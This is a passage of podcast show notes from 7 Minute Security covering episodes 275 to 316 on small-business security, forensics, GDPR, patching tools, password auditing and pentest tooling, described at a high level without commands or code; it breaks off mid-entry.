    • Tools that can help companies make SOC compliance efforts go more smoothly

    7MS #316: How to Succeed in Business Without Really Crying - Part 3 Jun 28, 2018

    In this episode I wanted to give you some cool/fun updates as it relates to 7MS the business! Specifically:

    • A new member of the 7MS team (kinda!)
    • The weird and varied projects I'm working on
    • Upcoming podcast sponsors (probably in July)
    • 7MS has a "real" office coming soon to the southern metro of MN (hopefully!)

    7MS #315: Creating a Personal DR Plan - Part 2 Jun 21, 2018

    As a continuation of last week's episode I'm now making a bit of progress in finding a good backup solution that protects USB backups both at rest and when pumped up to the cloud.

    I mentioned I've been using BackBlaze for backups (not a sponsor), and they allow you to backup USB drives as long as they're connected at least once every 30 days. That's cool. However, many of my USB drives are not encrypted, and I want to protect myself in the off chance that someone breaks in and steals all my stuff while those unencrypted drives are connected.

    My BackBlaze backup PC is just a little dinky box running Windows 10 Home, so I don't have access to BitLocker. I was gonna drop the ~$100 for the Windows 10 Pro upgrade, but I coincidentally was doing an endpoint security product evaluation at the same time, and so I grabbed a copy of ESET's DESLock (also not a sponsor) because it was on sale. Where I'm stuck now is that the USB drives are unlocked, and yet for some reason BB can't properly back them up. I've got a ticket into their support folks, and will update you once we get to part 3 of this miniseries.


    7MS #314: Creating a Personal DR Plan Jun 13, 2018

    You probably create DR plans for your business (or help other companies build them), but have you thought about creating one for yourself? Yeah, I know it's grim to think about "What will my loved ones do to get into my accounts, backups, photos, social media accounts..." but it's probably not a bad idea to prepare for that (spoiler alert: we all die at some point).

    Today I talk about how I'm beginning to build such a plan so my wife can take over for my/our online accounts. This plan includes:

    • A "here's how I run all our technology" Google doc with domains I have registered, their expiration date, what their function is, etc.

    • A how-to guide on restoring data from our online backup solution

    • Implementation of a password manager


    7MS #313: Push-Button Domain Admin Access Jun 07, 2018

    As I was preparing for my Secure 360 talk a month or so ago, I stumbled upon this awesome article which details a method for getting Domain Admin access in just a few minutes - without cracking passwords or doing anything else "loud." The tools you'll need are:

    • PowerShell Empire
    • DeathStar
    • Responder
    • Ntlmrelayx

    I've written up all the steps in a gist that you can grab here. Enjoy!


    7MS #312: OFF-TOPIC - Boxing a Cat May 30, 2018

    It has been a heck of a week (in a good way), and I'm taking a break from security so you can help me untangle a mystery that's been wrapped around my brain for years. I need you to help me figure out what this dude meant when he said that something was as frustrating "as boxing a cat."

    P.S. if you hate off-topic episodes no worries! We'll be back to our regularly scheduled security program next week!


    7MS #311: How to Build a Cuckoo Sandbox May 24, 2018

    This week I dove into building a Cuckoo Sandbox for malware analysis. There are certainly a ton of posts and videos out there about it, but this entry called Painless Cuckoo Sandbox Installation caught my eye as a good starting point.

    This article got me about 80% of the way there, and the last 20% proved to be problematic. I got some additional answers from the Cuckoo documentation but still left some answers to be desired.

    Through a lot of Googling, banging my head against the wall and looking at the GitHub issues list, I finally got everything working.

    I've taken my entire build process and included it as a gist here. Enjoy!


    7MS #310: Secure the Radio Commercials May 18, 2018

    Last week I was in the recording studio to record three 7MS commercials aimed at churches. The goal was to educate them on some security topics and close with a "hook" to contact 7MS for help securing your church.

    The commercials themselves are embedded in this episode so please have a listen and let me know what you think! I'll also let you know (via the podcast) when these commercials hit the air. It's likely the station won't air in your area, but you can catch it on the interwebs if you so desire (thanks again for your support, mom).


    7MS #309: Password Cracking in the Cloud - Part 2 May 09, 2018

    Cracking passwords in the cloud is super fun (listen to last week's episode to learn how to build your own cracking box on the cheap at Paperspace)!

    In the last couple weeks, customers have asked me about doing a password strength assessment on their Active Directory environment. I asked around and read a bunch of blogs and found a method that I think:

    • Extracts the hashes safely
    • Parses down the dump to contain only the hashes (so that if somebody popped my Paperspace cloud-crackin' box, they'd have just a list of half-cracked hashes and that's it)
    • Does the work pretty automagically

    I talk about this in more detail in today's podcast, and here's the gist you can follow with all the necessary commands to get AD crackin'!


    7MS #308: Password Cracking in the Cloud May 02, 2018

    I had an absolute ball this week trying to figure out how to crack passwords effectively, and on the cheap, and in the cloud. Today's episode goes into much more detail, and embedded below is the Gist of my approach thus far. If you've got things to add/suggest to this document, let me know!

    P.S. if you don't see the gist because you're reading this in a podcast-catching app, head to https://7ms.us and look up today's episode and you'll see the gist in all its gisty glory!


    7MS #307: Writing Security-Focused Radio Commercials Apr 25, 2018

    Hey, so this week I am without my main machine - thus no jingle or "jungle boogie" intro music. Feels weird. Feels real weird.

    Anyway, ya know how I teased last week that 7MS could possibly be coming to a radio station near you? Well I think it's more of a probability than a possibility at this point!

    I met with a radio exec a few weeks ago and we talked about:

    • Lots of people still listen to the radio (who knew?)
    • Creating a "security minute" spot that would lead to a commercial about 7MS
    • How to write a good commercial "hook"
    • It's difficult to write a 60-second commercial!
    • Targeted advertising at churches, which is an under-served market when it comes to infosec
    • Writing a new (shortened) 7MS jingle

    More on this today on 7MS!


    7MS #306: A Peek into the 7MS Mail Bag - Part 2 Apr 19, 2018

    We've dug into some pretty technical topics the last few weeks so we're gonna take it easy today. Below are some FAQs and updates I'll cover on today's show:

    FAQs
    • What security certs should a sales person get?

    • What lav mic should I get for podcasting?

    • How do I know if I'm ready to take the OSCP?

    • When are you gonna do some more YouTube videos?

    • When will the PacktPub project be done?

    Updates

    Don't forget to check out these new and/or updated pages on BPATTY:

    • Caldera

    • LAPS

    • PwnedPasswords

    Speaking engagements
    • I learned that the Cryptolocker song was played as muzak for a security conference. That makes me LOL ;-)

    • Those of you in Minneapolis/St. Paul are invited to join me for Blue Team on a Budget lunch and learn at Manny's - it's on May 3 and hosted by OneIdentity.

    • I'll be at Secure360 on May 16 to give my Blue Team on a Budget talk at 9:30 a.m., and I'll also be hosting our pal Bjorn for his Twin Cities vs. OWASP Juice Shop workshop on May 17. Gonna be awesome - hope you can come to either event (or both!).


    7MS #305: Evaluating Endpoint Protection Solutions - Part 2 Apr 12, 2018

    Today is part two of evaluating endpoint solutions, where I primarily focus on Caldera which is an adversary simulation system that's really awesome! You can essentially setup a virtual attacker and cut it loose on some test machines, which is what I did as part of an endpoint protection evaluation project.

    The attacks simulated are from Adversarial Tactics, Techniques & Common Knowledge (ATT&CK) project. So the big question is...did any of these endpoint solutions catch some of the simulated ATT&CKs? Check out today's podcast to find out!

    Oh, and I wrote up my quick install guide for Caldera here.


    7MS #304: Integrating Pwned Passwords with Active Directory Apr 05, 2018

    I've been super pumped about Troy Hunt's Pwned Passwords project ever since it came out - especially when I saw a tweet about using it in Active Directory so that enterprises could essentially stop people from picking previously pwned passwords! That led me to explore the following two solutions:

    Pwned Passwords DLL

    This blog entry has everything you need to get started with this GitHub project. If you've got some coding skillz you can probably give everything a quick read and have the DLL installed and running in no time. If you're like me and have little to zero Visual Studio experience, head to my BPATTY site page about Pwned Passwords where I've laid everything out step-by-step!

    Bottom line is this is a FREE way to check AD passwords against Troy's list of 500M+ previously pwned passwords. Awesome dude!

    SafePass.me

    I gave this commercial solution a demo and it worked fine as well. It's about $700 USD and comes packaged in an .MSI file that you simply double-click to install, then reboot the domain controller(s). It looks to do the exact same thing as Pwned Passwords DLL but without having to build a DLL or install it manually.


    7MS #303: Evaluating Endpoint Protection Solutions Mar 29, 2018

    I'm working on a fun project right now where I'm evaluating endpoint protection solutions for a client. They're faced with a choice of either refreshing endpoints to the latest gen of their current product, or doing a rip and replace with something else.

    I've spun up a standalone AD environment with ~5 Win 10 VMs and nothing on 'em except a current set of patches. The idea is I can assign each workstation VM an install of INSERT_NAME_OF_POPULAR_AV_VENDOR_HERE and have somewhat of a "bake off."

    Now what I'm finding is there are great sites like [AV Test](AV Test) or AV-Comparatives do a nice job of breaking down what kind of performance, features, and management offerings a given vendor has. But what I haven't found is some structured testing for "act like a bad guy" actions. I'm thinking things like:

    • Mimikatz tomfoolery
    • Lateral attacks with Metasploit shells
    • Egress port scanning (to find an acceptable outbound port for C2 or data exfil)
    • Jacking around with various PowerShell scripts and commands

    However, thanks to some awesome friends on Slack they pointed me to what looks to be a nice set of scripts/tests - many of which could be used to see what kind of behaviors the endpoint protection will catch. So coming up in part #2 of this series, I'll do a deeper dive into:

    • RTA
    • Atomic Red Team

    7MS #302: Bunnies and Bloodhounds Mar 22, 2018

    I've had a fun week with a mixed bag of security related stuff happening, so I thought I'd throw it all in a big stew and cook it up for today's episode. Here are the highlights:

    Bash bunny preso

    I had a fun opportunity this week to speak to some property managers about the threats the Bash Bunny poses to an environment. Specifically I showed the one-two punch of:

    • How BB can steal your wireless network pre-shared keys that are saved to your PC

    • How BB can go into "Responder mode" to capture credentials

    • From the comfort of my mom's basement I can steal all this stuff, have it emailed to me, then drive up to your parking lot and join your wifi network with valid network creds! Sneaky bunnies FTW!

    Bloodhound

    I got to run this on a big AD environment this week and the results were super interesting. I'm working on a down and dirty Bloodhound quick start guide for BPATTY (coming soon).

    Brian's botched wireless

    Lesson learned this week: doing large Nessus scans from your home network can crush your ERX so scan with care (specifically, go into your Nessus policy and don't scan as many hosts simultaneously - I cranked mine down from like 100 hosts at a time to 5).


    7MS #301: CredDefense Mar 15, 2018

    Intro

    CredDefense is a freakin' sweet tool from the fine folks at Black Hills Information Security that does some really nifty things:

    Password filter

    Lets say you use the out-of-the-box password policy that comes with Active Directory, and you want to change your password to Winter2017! - AD is gonna say "Yeah dude/dudette, go for it...it fits the bill!" But from an attacker's perspective we know this is bad - people love to pick bad seasonal passwords like Winter2017, Summer2019, etc.

    With CredDefense's password filter in the mix, any new password gets checked against an additional word list, and if there's a match found within, BAM!! - password rejected.

    Password audit

    Ok, so now are you curious who in your AD environment is already using crappy passwords like Winter2017? Load up the password audit feature, feed it a big wordlist like rockyou, and you'll be good to go in no time.

    ResponderGuard

    This is a nifty PowerShell tool that can jack with pentesters/attackers in your environment who are running the popular cred-stealing Responder tool. And what I especially appreciate from a blue team perspective is that if ResponderGuard catches Responder in use in the environment, it can stamp a log in the event log, which can then in turn generate an email if you're using something like WEFFLES (which we talked about recently) and the nifty WEFFLES email script my pal hackern0v1c3 put together here.


    7MS #300: Windows System Forensics 101 - Part 2 Mar 09, 2018

    In today's continuation of last week's episode I'm continuing a discussion on using free tools to triage Windows systems - be they infected or just acting suspicious. Specifically, those tools include:

    • FTK Imager - does a dandy job of creating memory dumps and/or full disk backups of a live system. You can also make a portable version by installing FTK Imager on a machine, then copying the C:\Program Files\wherever\FTK Imager\lives to a USB drive. FTK on the go!

    • Redline grabs a full forensics pack of data from a machine and helps you pick apart memory strings, network connections, event logs, URL history, etc. The tool helps you dig deep into the timeline of a machine and figure out "What the heck has this machine been doing from time X to Y?"

    • DumpIt does quick n' dirty memory dumps of machines.

    • Volatility allow you to, in a relatively low number of commands, determine if a machine has been up to no good. One of my favorite features is extracting malware right out of the memory image and analyzing it on a separate Linux VM with something like ClamAV.


    7MS #299: Windows System Forensics 101 Feb 28, 2018

    I had the privilege of creating a Windows System Forensics 101 course/presentation for a customer. The good/bad news is there is so much good information out there, it's hard to boil things down to just an hour.

    For the first part of the presentation, I focused on Mark Russinovich's technique of using Sysinternals as the primary surgical tool. This approach includes things like:

    1. Use Process Explorer to find processes with no signature and/or description.

    2. Put any suspicious processes to sleep before killing them (it's more humane! :-)

    3. Use autoruns to find registry entries, scheduled tasks, etc. that might be hooked to malicious executables that run on startup.

    4. Rinse and repeat.

    In part 2 (coming up soon!), I'll continue the forensics fight and talk about tools like Redline, Volatility and FTK Imager! Stay tuned.


    7MS #298: How to Succeed in Business Without Really Crying - Part 2 Feb 15, 2018

    Last week I talked about how business has been going with the LLC. Today I answer some additional questions that I didn't have time to address:

    • How I'm finding leads/projects to work on (TLDR: I'm NOT sending 1TB of PDFs to people, spamming them, calling them endlessly or LinkedIn'ing everybody and their mom)

    • The interesting conversations I'm having with customers who seem a little tired of the traditional pentest/assessment song and dance (spoiler alert: they're looking for people with solutions and who will actually help remediate the stuff in the report!)

    • The training services I'm offering are getting a lot more interest than I expected - and I think that's due to some of the sessions being more technical, yet not as intense as, say, a SANS course or the OSCP.

    More on today's show!


    7MS #297: How to Succeed in Business Without Really Crying Feb 08, 2018

    Intro

    Here's some of the "juice" that has helped 7MS have a successful start:

    Support system

    Ok so I think if you're going to have a successful business, you need an awesome support system. Mine consists of some of these things:

    • Faith - I'm a Christian and pray about this business constantly. In fact I learned really quickly how easy it is to brag about your rock-solid faith when everything is going fine. And then when suddenly the rug is pulled out from under you, you find what your faith is really made of!

    • My wife - she's my biggest supporter and cheerleader.

    • Financial advisor - we have a great "money guy" who helped us plan for moments like these, where income might be slower as I drum up business.

    • Trusted advisors - I'm blessed to have a partner called InteProIQ that has been a sounding board for a zillion and one questions. Everything from helping me quote projects and set hourly rates to marketing plans and connecting me with other business owners and contacts.

    General "get your business started" stuff
    • Form your LLC - I just Googled how to do it, and found a bunch of articles with good info. Basically I found my state's Web site hierarchy and within that was a place to register the LLC and grab an EIN for tax purposes.

    • Bank accounts - I visited my local banker and setup work checking/savings/etc.

    Tech tools to help you get the job done
    • Quickbooks - I use this to keep track of expenses, send out quotes, reconcile invoices, etc.

    • Expensify - I use it to track receipts and mileage. They even give you an email address where you can forward receipts to and it'll work it's awesome OCR magic to automatically extract the vendor, charge and date. Awesome!

    • Toggl - a free Web interface (and app) to track time for projects (if the client doesn't already have something they want me to use)

    ....more on 7MS.us!


    7MS #296: WEFFLES - Windows Event Logging Forensic Logging Enhancement Services Feb 01, 2018

    WEFFLES are delicious!

    WEFFLES stands for Windows Event Logging Forensic Logging Enhancement Services and is Microsoft's cool (and free!) console for responding to incidents and hunting threats. I had a chance to play with it in the lab this week and for the most part, the install of WEFFLES went well, but I had one minor issue that was cleared up easily.

    As I went through the MS TechNet article, I wrote a full install write-up on my BPATTY site.

    So go gobble up some WEFFLES and let me know how it goes!


    7MS #295: Interview with Kevin Keane Jan 25, 2018

    Today I'm excited to be joined by my friend and advisor Kevin Keane (Twitter / LinkedIn) who is a lawyer, blogger, keynote speaker, business advisor, and just all around great guy. Kevin and I sit down to talk about:

    • How SMBs can take some productive security baby steps
    • How to get the most value out of your next security consultant engagement
    • Can breaches ever be funny?
    • What is the Trust Calculus?
    • Do I need to care about GDPR?

    That and much more is coming up today on this special interview edition of the 7 Minute Security podcast!


    7MS #294: GDPR Me ASAP Jan 18, 2018

    GDPR in a nutshell

    GDPR, in a nutshell, is a set of legal regulations focused on the privacy of personal information for EU citizens - no matter where they are. Entities that store and/or process personal information about EU citizens must clearly explain to the citizens what data is being stored and processed, and any parties the data is being shared with. The citizens must opt-in and agree to each instance or reason that their data is being stored and processed. The citizens also must be able to, at any time, request a copy of the data or request that it be deleted.

    How does GDPR define "personal data"

    As “any information relating to an identified or identifiable natural person."

    When do GDPR regulations start being enforced?

    May 25, 2018.

    What are the key roles organizations need to be aware of as it relates to handling data under GDPR regulations?

    Two primary roles:

    Controller

    An entity that determines the purposes, conditions and means of the processing of personal data

    Processor

    An entity which processes personal data on behalf of the controller

    What are the GDPR lawful basis for processing data?
    • Consent: the individual has given clear consent for you to process their personal data for a specific purpose.

    • Contract

    • Legal obligation

    • Vital interests

    • Public task

    • Legitimate interests

    Are there any good step-by-step guides to GDPR compliance?

    This site lays things out at a high level with a 12-step program, if you will.

    How can I learn more about GDPR?

    This http://gdprandyou.ie/ site is a great GDPR primer, and this PDF from Imperva is good as well. I also googled GDPR for dummies and found some good results too :-)


    7MS #293: How to Become a Packtpub Author - Part 2 Jan 04, 2018

    Back in episode 280 I talked about how I started working with PacktPub to start authoring a video course on vulnerability scanning using Kali.

    Since that episode I've found that recording and editing high quality video clips is taking waaaaaayyyyyyyyyyy longer than I'd like, but it's worth it to create good stuff! PacktPub authored a tool called Panopto to make videos, but I found it a little frustrating to work with, so I'm going with the following janky - but functional - recording setup:

    • Record raw video using iShowU

    • Pull that video into iMovie and cleanup all the mistakes

    • Record audio in Quicktime

    • Pull audio clips into iMovie and edit those to match up with what's happening in the video

    • Export video as 1080p

    Additionally, here are a few little tweaks that help the content creation match up with PacktPub's requirements:

    • Resolution should be 1920x1080 (full HD) - I just bought a secondary monitor for this. Specifically, an HP 22cwa.

    • I set my .bashrc file to use all white for the terminal prompt. See this article which helped me out.

    • In Terminal I created a PacktPub profile that has font as Monospace Regular 20pt.


    7MS #292: OFF-TOPIC - How I Nearly Killed My Sister with a Snowball Dec 28, 2017

    Hey folks, I had originally planned to cover the CredDefense toolkit but I couldn't get it working. I'm basically having the same issue that someone reported here. Sooooo....will have to save that for next week.

    In the meantime, this episode features a story about how I nearly knocked a retina out of my sister's face with an ice ball when I was about 8 years old. Yep, she's still mad about it, but I think 2018 is the year for forgiveness!

    Enjoy, and we'll talk to you in 2018. Blessings to you and yours!


    7MS #291: The Quest for Critical Security Controls - Part 4 Dec 21, 2017

    Did I mention I love the Critical Security Controls? I do. And here's an absolute diamond I found this week:

    This site (http://www.auditscripts.com/free-resources/critical-security-controls/) offers awesome CSC-mapping tools (and they're free!), specifically:

    • A spreadsheet with how the CSCs map to other popular frameworks like ISO and NIST

    • A manual assessment tool for measuring your org - or someone else's org - against the CSCs. Flippin' sweet right? RIGHT!

    Also, be sure to come and Slack chat with us, as my pal hackernovice is building a tool called MacMon to help you satisfy CSC #1!

    Lastly, I built an LOL-worthy pentesting recon tool called SSOTT (Scan Some of the Things) that might help you automate some NMAPing, DIRBing, NIKTOing, and the like. Cheggitout!


    7MS #290: Interview with Joe Klein Dec 14, 2017

    My pal and former coworker Joe Klein joins me in the virtual studio to discuss:

    • His career as a diesel mechanic and insurance guru
    • How to leave a stable job, take a huge pay cut and start a risky infosec internship (sounds like the name of a broadway musical!)
    • The start of his new career as a SOC analyst
    • The importance of having a career cheerleader/mentor
    • Being hungry for knowledge and certifications without being ashamed or afraid to look like a newb
    • CompTIA Security+ and Cisco CCNA Cyber Ops certs
    • The proper pronunciation of the word "dude"
    • How to do a proper Arnold Schwarzenegger impression

    Other references made in the episode:

    • Arnold Schwarzenegger the love poet

    Joe welcomes your comments, concerns, insults and questions via email (listen to today's episode for the address!) or Twitter.


    7MS #289: I'm Dipping My Toes in Windows Forensics Dec 07, 2017

    Two weird things happening in this episode:

    • I'm not in the car, and thus not endangering myself and others while podcasting and driving!

    • My once beloved lav mic made a trip through the Johnson family's washer and dryer. I don't know that she'll ever record anything again. We'll see once it fully dries out (fingers crossed).

    I spent some time this last week getting back into Windows systems forensics, which has been really fun. If you want a play-by-play guide with some fantastic, practical, hands-on advice, grab yourself a copy of the Blue Team Handbook: Incident Response Edition. I also started a forensics page on BPATTY.

    Also, I picked up a Google Home Mini for $30 and can honestly say it quickly has found a special place in my tech/geek heart...even if it is recording everything I say and sending it to the NSA. But a small device that will play Michael Buble's Christmas album as soon as I command it with my voice? Worth the privacy sacrifice.

    Finally, if you're in the St. Paul, MN area tomorrow and wanna hear me come talk about "Blue Team on a Budget," come to the Government IT Symposium - more info here.


    7MS #288: I'm BURPing a Lot Dec 01, 2017

    Sorry the podcast is late this week - but it's all for good reasons! I'm busy as a bee doing a ton of pentesting so I have a smattering of random security stuff to share with you:

    Mac High Sierra root bug

    Did you hear about this? Basically anybody could log in as user root on your system without a password because...there isn't a password! Read the Twitter thread where I originally read the news here, read about the root account madness here, and then read how the fix broke file sharing here.

    BPATTY ROCKS!

    I tried to wiki-fy my BPATTY project to make it a bit easier to read, so head to bpatty.rocks and let me know what you think!

    I'm BURPing a lot

    I can't tell you how fun it has been to get back in the pentesting saddle and hack some Web sites these past few weeks. Here are a few tips/tricks others taught me that have helped me get back in the swing of things:

    • In Burp, state files are being depreciated in favor of project files. Read more here

    • For BApp extensions, here are a few that help you get the job done:

      • retire.js looks for old/outdated/vulnerable Javascript libraries
      • Software vulnerability scanner helps you find vulnerable software, such as old versions of IIS
      • CO2 has a bunch of tricks up its sleeve - my favorite of which is helping you craft sqlmap commands with the right flags

    More on today's show!


    7MS #287: Introducing 7 Minute Security LLC Nov 22, 2017

    Well, after over-teasing this last week, I'm excited to announce that I've started my own company! 7 Minute Security, LLC gives me an outlet to do all my favorite infosec stuff, such as:

    • Network assessments
    • Vulnerability scanning
    • Penetration testing
    • Training
    • Public speaking

    I welcome you to check out 7MinSec.com for more information. Or 7MinuteSecurity.com or SevenMinuteSecurity.com. Collect 'em all!

    What does this mean for the podcast?

    Nada - I'll keep cranking it out. Maybe we'll cover a few more business related topics (people have asked about how to get an LLC off the ground, so I might do an episode or two on that), but otherwise everything's the same!

    What about the Patreon project?

    Because I've been blessed with this opportunity - which will in turn help me keep the 7MS lights on - the Patreon campaign will close down soon. For you lovely Patreons, I've sent you a message (via Patreon site and via email) with more details.


    7MS #286: The Quest for Critical Security Controls - Part 3 Nov 16, 2017

    We're continuing to hammer on the CSCs again this week. Here's some rad resources that can get your CSC efforts in the right direction:

    • CIS Implementation Guide for SMEs

    • CIS Cybersecurity quarterly newsletters

    • Netdisco lets you locate machines by MAC or IP, show the corresponding switch port, and disable it if necessary.

    • Defensive Security Handbook isn’t specifically mapped to CSCs but offers great advice to tie into them.

    • Open-Audit tells you what’s on your network, how it’s configured, and when it changes.


    7MS #285: The Quest for Critical Security Controls - Part 2 Nov 09, 2017

    Nothing to do with security, but I've heard this song way too much this week.

    I love the CIS Controls but it seems like there isn't a real good hands-on implementation guide out there. Hrmm...maybe it's time to create one? Speaking of that, check out the MacMon project and chat with us about it via Slack.

    After hearing rave reviews about Fingbox (not a sponsor), I picked one up (~$120) and wow, I'm impressed! It's got a lot of neat features that home users and SMBs would like as it related to mapping to CSC #1:

    • Ability to map network devices to users to create an inventory
    • Email alerts for new devices that pop up on the network
    • Block unwanted users from the app, even when not directly connected to the LAN
    • Nice set of troubleshooting tools, such as wifi throughput test, Internet speed test, and port scanning of LAN/WAN devices

    More on today's show...


    7MS #284: The Quest for Critical Security Controls Nov 02, 2017

    For a long time I've been electronically in love with the Critical Security Controls. Not familiar with 'em? The CIS site describes them as:

    The CIS Controls are a prioritized set of actions that protect your critical systems and data from the most pervasive cyber attacks. They embody the critical first steps in securing the integrity, mission, and reputation of your organization.

    Cool, right? Yeah. And here are the top (first) 5 that many organizations start to tackle:

    1. Inventory of Authorized and Unauthorized Devices
    2. Inventory of Authorized and Unauthorized Software
    3. Secure Configurations for Hardware and Software
    4. Continuous Vulnerability Assessment and Remediation
    5. Controlled Use of Administrative Privileges

    Google searches will show you that you can definitely buy expensive hardware/software to help you map to the CSCs, but I'm passionate about helping small businesses (and even home networks!) be more secure, so I'm on a quest to find implementable (if that's a word?) ways to put these controls in place.

    I'm focusing on control #1 to start, and I've heard great things about using Fingbox (not a sponsor) to get the job done, but I'm also exploring other free options, such as nmap + some scripting magic.

    More on today's episode...


    7MS #283: OFF-TOPIC - I Love Cops and COPS Oct 27, 2017

    My plans for this week's podcast went hush-hush, kablooie, bye-bye, see ya, adios.

    So, I'm pinch-hitting and going off-topic and talking about...of all things...cops. Now wait! Wait wait! Don't run away. I'm not going all political on you or anything like that. Just wanna share some anecdotes and perspectives on the following:

    • What it was like growing up with a dad who was a cop

    • Losing a cousin in the line of duty

    • Getting a call from my local police department this week claiming I was a danger to a school bus full of kids. Whaaaaa?

    • Oh, and I sing a little bit on this episode too.


    7MS #282: A Peek into the 7MS Mail Bag Oct 19, 2017

    I'm gonna level with you: it's been a heck of a week. So I thought I'd try something a little different (and desperate?) and use this episode to answer some FAQs that come in via email and Twitter DM. Today's burning questions include:

    Q: Do I think it's dangerous to podcast and drive?

    A: Not really, especially now that I got one of these babies.

    Q: What is the eJPT cert all about?

    A: It looks like a pentest training/cert path that sits somewhere (difficulty wise) between CEH and OSCP. It's favorably reviewed and will set you back a few hundred dollars.

    Have you taken this cert? I'd love your feedback and, if possible, to do a mini Skype interview with you for the show. Drop me a note and lets chat.

    Q: What's a good place to practice Web hacking skills online?

    A: I've been a long time fan of Juice Shop, and up next in my queue is HackTheBox.

    Q: Any more Vulnhub.com VMs in the works?

    A: Kinda. Listen to today's episode :-)


    7MS #281: Baby's First Banking Infosec Conference Oct 11, 2017

    I went to my first ever banking-focused infosec conference a few weeks ago (WBA's Secure-IT) and learned a ton.

    I met some really great people and had many productive conversations around security. The main takeaways from the conference that I talk about in today's episode:

    • Standing all day and talking about security is exhausting!

    • You can thwart "swag whores" (sorry mom, but I learned that that's what they're called!) by pushing your merch table deep into the booth so it's touching the rear curtain. That way people have to go through your "people perimeter" and engage in conversation with you in order to be granted access to the swag!

    • From the conversations I had with the staff at these small banks, they're definitely wanting to slurp up as much helpful info from the sessions as possible. Specifically, finding ways to better improve security posture using free/cheap tools is ideal!

    • I attended a few sessions that got my blood boiling. The outline of these talks went something like this (slight exaggeration added, but not much):

      • Hackers are way smarter and more physically attractive than you, and they can get by all your defenses with ease
      • You're helpless, hopeless, and not physically attractive
      • Luckily we (Vendor X) are here and we offer our patented Super Solution Y that will thwart the APTs 100% of the time, no question, guaranteed
    • People don't appreciate being talked down to, nor do they want to be shamed, blamed or scared into making security better.

    More on today's episode...


    7MS #280: How to Become a Packtpub Author Oct 05, 2017

    I'm excited to announce I'm going to be a PacktPub author! I'm going to work with them to create a course on network/vulnerability scanning. I'm pumped, but kinda nervous, so when I had the initial conversations with PacktPub staff, I made sure I hit them with my burning questions:

    Q: Are you going to ask me to create a sweet course and then pay me pennies for every digital copy sold?

    A: No. Authors get paid a lump sum up front and then share in profits for digital copies sold.

    Q: Who's gonna dictate the project outline - as well as timeline for recording it?

    A: It's a joint effort. The author dreams up the timeline, fine-tunes it with PacktPub, and then hammers out a mutually agreeable project timeline.

    Q: Do I have to buy some expensive software/hardware to make these videos?

    A: Not really. PacktPub did recommend I buy a better microphone (so I got a Snowball), and then they license authors a copy of Panopto to record the videos.

    More Qs and As covered on today's episode!


    7MS #279: Patching Solutions Bake-Off - Part 4 Sep 28, 2017

    Intro

    The patching solutions review concludes this week with Ivanti's patch solution, as well as PDQ Deploy/Inventory.

    As a quick reminder, here's where our bake-off currently sits:

    • Ninite (covered in 7MS #275)
    • ManageEngine (covered in 7MS #277)

    Quick reminder: none of these solutions are bribing me with fat wads of cash to plug their products. Some day I hope to have such problems, but today is not that day.

    Ivanti

    You might know Ivanti as Shavlik - that's the product name I'm more familiar with anyways. Back in February, Shavlik became Ivanti.

    Pros
    • Pretty easy to install and manage - even without a deep background in IT (in today's episode I tell a story that can back this claim based on my experience)

    • Does a solid job of applying patching Windows OS and third party

    Cons
    • Pricing is a little steep - last figures I saw were ~$80 per server, per year and ~$40 per workstation, per year.

    • ITScripts library (that allows for GPO-style policy enforcement) is a little slim when compared to similar functionality offered from other solutions

    PDQ Deploy/Inventory Pros
    • Lets you crazy with building custom packages you can deploy to granular groups

    • Awesome online help resources, including a YouTube video library that's got a video for just about everything

    • Quick response to support tickets

    Cons
    • A bit more complicated to get comfortable with than the other solutions

    • A little confusing on the Windows patching side - not quite as "point and patch" as some of the other solutions

    • Agentless system - machines have to be able to "see" the PDQ


    7MS #278: Interview with Rob Sell Sep 21, 2017

    Intro

    We're breaking ground with this episode, folks! For the first time in 7MS history, we've got a guest on the show (finally, right?!).

    Rob Sell is an IT manager who has been working in IT for many years, with a focus on information security specifically for the last 4 years. He recently came home from Defcon 25 with a third place in the SE CTF.

    Rob sat down with me to discuss the CTF, how to make an outstanding CTF audition video, OSINT tools/tips/techniques, the value of tech/security certifications, career advice, and more!

    Interview notes and links
    • Here's Rob's Defcon CTF audition video

    • EchoSec helps you see a geographical area at a certain point in time. According to the Web site, EchoSec is "the most comprehensive social sentiment tool on the market" - hmmmm, seems like a great SE tool!

    • X-Ray is "a tool for recon, mapping and OSINT gathering from public networks."

    • Michael Bazzell's Web site has online training, free tools and other goodies. Michael also has some books.

    • Christopher Hadnagy has a podcast that's strictly focused on SE. He's also got some books.

    • ArcGIS isn't necessarily labeled as an SE tool, but can certainly be used for SE efforts.


    7MS #277: Patching Solutions Bake-Off - Part 3 Sep 14, 2017

    ManageEngine Desktop Central

    Overall, I have to bluntly say that I really enjoyed playing with ManageEngine's solution. It's got a crap-ton of features built into it - above and beyond patching - that I think IT/security folks will really appreciate.

    Pros
    • Agent or agentless management of systems

    • MDM (didn't play with it but it certainly looks feature-rich)

    • Application white/blacklisting

    • Ability to push out configurations for things you'd normally use GPOs for - i.e. setting a login banner, enforcing screen locks, setting IE homepage and search engine, etc.

    • Patch management is full-featured - it's easy to setup a simple "scan systems, download and deploy missing patches." Or just a "scan to identify missing patches" kind of thing. It's easy to run a variety of reports to find out which systems are most vulnerable, which patches are missing across the enterprise, etc.

    • Software deployment engine - there's a big package library where you can easily search and deploy things like Dropbox, Adobe Reader, etc. It also includes a self-service portal where users can simply select certain packages and have them installed automagically!

    • Inventory - ability to have detailed hardware/software level details on each machine. Ability to block software by path and/or hash. You can also give people a warning saying "We're gonna nuke dropbox in 2 days if you keep it on here!"

    • Agent-based install gives you ability to chat with users, remote control systems, send announcements, drop to a command line at a target machine, etc.

    • Reports - you can create a report for just about anything under the sun like AD group changes, user logon reports, users that are disabled/expired, and on and on...

    • Email alerts - I think you can trigger an email alert for just about ANYTHING that happens in the environment.

    ...more on today's episode!


    7MS #276: The CryptoLocker song Sep 06, 2017

    This is it! The worldwide Internet debut of an original infosec-themed song called CryptoLocker'd, and as the name implies, it's about a CryptoLocker incident. Here's the quick back story:

    A few years ago a worked on an incident response where a user got phished with a promise of a free burrito from Chipotle but instead got a free order of CryptoLocker! And rather than tell IT or sound the alarms, the user just left for the day! The next day they came back and the company was digitally on fire, and they played ignorant to what was going on.

    I found the user's handling of the situation humorous (read: not the CryptoLocker infection itself!), so I was inspired to write a song about it. Today's episode has the audio, and I welcome you to follow along with the lyrics below (head to 7ms.us to see the full lyrics as they are included in a GitHub gist)


    7MS #275: Patching Solutions Bake-Off - Part 2 Aug 30, 2017

    This episode continues our series on comparing popular patching solutions, such as:

    • Ninite
    • ManageEngine
    • Ivanti
    • PDQ
    Ninite

    This week I focused on Ninite, and here's the TLDR version:

    Pros
